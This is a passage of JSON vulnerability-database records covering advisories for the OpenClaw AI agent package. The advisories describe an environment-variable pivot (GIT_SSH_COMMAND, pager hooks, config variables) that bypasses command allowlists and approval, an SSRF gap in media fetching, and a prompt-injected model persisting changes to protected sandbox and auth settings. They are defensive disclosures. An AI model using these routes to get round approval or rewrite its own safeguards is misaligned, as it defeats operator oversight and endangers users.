hted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-73cz-n29z-uqem"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50764?format=json","vulnerability_id":"VCID-74bc-hfqh-cbcd","summary":"OpenClaw's `system.run` env override filtering allowed dangerous helper-command pivots\n`system.run` env override sanitization allowed dangerous override-only helper-command pivots to reach subprocesses. A caller who could invoke `system.run` with `env` overrides could bypass allowlist/approval intent by steering an allowlisted tool through helper-command or config-loading environment variables such as `GIT_SSH_COMMAND`, editor/pager hooks, and `GIT_CONFIG_*` / `NPM_CONFIG_*`.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e27bbe4982439da6864160fd1b66445058f74801","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e27bbe4982439da6864160fd1b66445058f74801"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.7"},{"reference_url":"https://github.com/advisories/GHSA-j425-whc4-4jgc","reference_id":"GHSA-j425-whc4-4jgc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j425-whc4-4jgc"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j425-whc4-4jgc","reference_id":"GHSA-j425-whc4-4jgc","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-j425-whc4-4jgc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74554?format=json","purl":"pkg:npm/openclaw@2026.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-j425-whc4-4jgc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-74bc-hfqh-cbcd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/88979?format=json","vulnerability_id":"VCID-75yr-sbce-nkah","summary":"OpenClaw QQ Bot Extension missing SSRF Protection on All Media Fetch Paths\n## Impact\n\nQQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths.\n\nQQ Bot media download paths were not consistently routed through the SSRF guard and allowlist policy.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @adithyan-ak for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41914","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11193","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11153","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11187","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41914"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3fv3-6p2v-gxwj","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:55:12Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3fv3-6p2v-gxwj"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41914","reference_id":"CVE-2026-41914","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41914"},{"reference_url":"https://github.com/advisories/GHSA-3fv3-6p2v-gxwj","reference_id":"GHSA-3fv3-6p2v-gxwj","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3fv3-6p2v-gxwj"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths","reference_id":"openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:55:12Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-in-qq-bot-media-fetch-paths"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41914","GHSA-3fv3-6p2v-gxwj"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-75yr-sbce-nkah"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89144?format=json","vulnerability_id":"VCID-7akj-469t-57hz","summary":"OpenClaw: Agent gateway config mutations could change protected operator settings\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe agent-facing `gateway config.patch` / `config.apply` guard did not cover several operator-trusted settings, including sandbox policy, plugin enablement, gateway auth/TLS, hook routing, MCP server configuration, SSRF policy, and filesystem hardening. A prompt-injected model with access to the owner-only gateway tool could persist changes to those settings.\n\nThis is a model-to-operator guard bypass, not a remote unauthenticated gateway compromise. Severity is medium.\n\n## Fix\n\nOpenClaw now blocks model-driven gateway config mutations for the broader operator-trusted path set and covers per-agent overrides and array-entry patching.\n\nFix commit:\n\n- `fe30b31a97a917ecc6e92f6c85378b6b20352422`\n\n## Release\n\nFixed in OpenClaw 